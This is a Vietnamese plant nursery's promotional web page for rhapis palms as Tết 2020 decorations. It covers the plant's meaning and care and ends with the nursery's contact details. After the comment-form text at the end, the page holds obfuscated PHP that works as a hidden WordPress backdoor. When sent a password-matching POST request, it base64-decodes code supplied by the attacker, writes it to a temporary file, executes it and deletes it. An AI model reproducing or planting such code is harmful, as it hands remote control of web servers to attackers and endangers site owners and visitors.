Địa chỉ cung cấp cây trúc mây Tết 2020

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Tết đến xuân về là thời điểm thịch hợp để trang hoàng ngôi nhà của mình bằng những loài cây hoa ý nghĩa và đẹp đẽ. Nếu đang muốn mua một loại cây trang trí ngày Tết mà chưa lựa chọn được thì hãy để chúng tôi giới thiệu đến các bạn một loại cây vô cùng ý nghĩa là cây trúc mây và địa chỉ cung cấp cây trúc mây Tết 2020.

 

Tìm hiểu về cây trúc mây 

 cây trúc mây
Địa chỉ cung cấp cây trúc mây Tết 2020

Cây trúc mây là một trong số loài cây được ưa chuộng ở châu Á, có hên khoa học là Rhapis excelsa, chúng được trồng rất phổ biến ở một số nước Đông Á, trong đó có Trung Quốc, Nhật Bản và cả ở nước ta. Trúc mây có rất nhiều tên gọi khác nhau như Mật cật hoặc một số nơi người ta gọi chúng là trúc xanh bởi màu sắc đặc trưng xanh ngắt của chúng.

 

Trúc mây cùng họ với một số loài cây gần gũi người dân Việt Nam như cau, mây, cọ,… với phần thân nhẵn và có nhiều đốt nhỏ chính vì vậy chúng rất dược ưa chuộng và mang tính thẩm mĩ cao. Thông thương cây sống thành từng bụi lớn với thân lớn có thể rơi vào khoảng từ 1 đến 2m cùng nhiều lá nhỏ xung quanh tạo ra cảm giác cây  xanh tốt giúp tạo ra không khí trong lành.

 

Nhờ tác dụng của mình mà trúc mây thường được sử dụng để trang trí cho không gian các văn phòng, vừa lịch sự trang nhã vừa có tác dụng thanh lọc và thải các loại khí độc amoniac, formaldehyde một cách vô cùng hiệu quả. Chưa kể một ưu điểm giúp trúc mây được sử dụng nhiều đến vậy là vì chúng vô cùng dễ trồng, dễ nuôi và đặc biệt có khả năng chống chịu với sâu bệnh vô cùng tốt.

 

Không chỉ là một loài cây đặt ở văn phòng để thanh lọc không khí mà trúc mây còn có vẻ đẹp vậy nên những khu vực nư tiền sảnh hay khu vực quầy lễ tân sử dụng loại cây này trưng bày cũng vô cùng hợp lý. Tết 2020 này hứa hẹn là thời điểm bùng nổ của cây trúc mây, ngoài những loại cây truyền thống vào ngày Tết như đào, quất thì những năm gần đây rất nhiều các loại cây đẹp và ý nghĩa thường được đem trưng trong nhà để mong có một năm mới đủ đầy, hạnh phúc, tiền tài nở rộ. một trong số những loại cây đó là trúc mây.

 

Ý nghĩa của cây trúc mây 

Ý nghĩa của cây trúc mây 
Ý nghĩa của cây trúc mây 

Nhắc đến trúc mây người ta thường liên tưởng đến một loại cây xanh thuần túy tuy nhiên loại cây đơn giản này không những có nhiều tác dụng mà chúng còn có nhiều tầng ý nghĩa vô cùng giá trị. ngay như trong cấu  tạo của chúng ta đã thấy được sự liên kết chặt chẽ, mật thiết giữa những nhánh cây trúc mây và sự vững vàng ngay thẳng của thân cây như để chứng minh biểu tượng của cây như thể hiện tình gắn bó keo sơn mật thiết, chung sức đồng lòng, mọi người đoàn kết. Những con người đó đặc trưng với ý chính quyết tâm, cốt cách ngay thẳng.

 

Đối với các gia đình trồng cây trúc mây thì gia chủ hy vọng năm mới gia đình sung túc sum họp, đầm ấm và đoàn kết như những thân trúc gắn liền với với nhau. Đối với những công ty trưng bày trúc mây thì họ mong muốn trong năm mới công ty luôn vững mạnh và phát triển như thân trúc, tâm tính, con người luôn ngay thẳng, các lãnh đạo cho đến nhân viên luôn luôn luôn sáng suốt và cùng vì một mục tiêu chung là vương về phía trước, cùng động viên giúp đỡ nhau vương lên phía trước

 

Ngoài những ý nghĩa ẩn ý đó ra thì việc trồng cây trúc mây trước cửa nhà hay ngay cửa văn phòng còn có ý nghĩa giúp không khí dược thanh lọc bởi cây trúc mây hít hết khí độc và làm trong lành không khí cũng như giúp cho gia chủ tin tưởng rừng chúng có thể xua đuổi tà ma.

 

Một số lưu ý khi trồng cây trúc mây 

 

Cây trúc may là một trong loại cây rất dễ trồng cũng như là một loại cây phát triển khá tốt, tuy nhiên trong giai đoạn đầu khi cây sinh trưởng vẫn cần chăm sóc cẩn thận, cây nhỏ cần che chắn cẩn thận tránh cho cây bị ảnh hưởng trực tiếp từ ánh nắng mặt trời.

 

Đất trồng cũng cần chọn những loại đất giàu dinh dưỡng cũng như có khả năng thoát nước, đất trồng trúc mây cũng có thể kết hợp cùng với cát và sơ dừa, đây đều là những nguyên liệu rất tốt để thoát nước. Ngoài ra với những cây trồng ở không gian văn phòng thì các bạn có thể cung cấp đủ nước cho cây, đặt cây ở những nơi có thể đón được nguồn sáng tự nhiên. Với không gian văn phòng các bạn nên thường xuyên cắt bớt lá và tỉa cành để có được sự thông thoáng và tránh côn trùng.

Một số lưu ý khi trồng cây trúc mây 
Một số lưu ý khi trồng cây trúc mây 

 

Địa chỉ cung cấp cây trúc mây Tết 2020

Nếu đang tìm mua cây trúc mây xanh tốt, đầy ý nghĩa các bạn đừng nên bỏ qua địa chỉ tin cậy vườn cây Hòa Bình. Nơi đây sẽ cung cấp cho bạn những sản phẩm cây chất trúc mây chất lượng nhất, đẹp nhất để các bạn có thể trưng bày trong những ngày Tết ý nghĩa nhất.

 

Với đội ngũ nhân viên tư vấn nhiệt tình và chuyên nghiệp chắc chắn sẽ khiến các bạn hài lòng cũng như có thêm nhiều kiến thức bổ ích trong việc chơi và chăm sóc cây cảnh cung cấp sản phẩm cây trúc mây Tết 2020. Mọi chi tiết xin liên hệ:

 

CÂY XANH HÒA BÌNH

Hotline: 0962.376.560
Bán hàng: 0962.376.560
Nguyễn Trường Giang
Địa chỉ: Cầu Mai Lĩnh, Biên giang , Hà Đông ,Hà Nội

 

 

 

 

 

 

 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}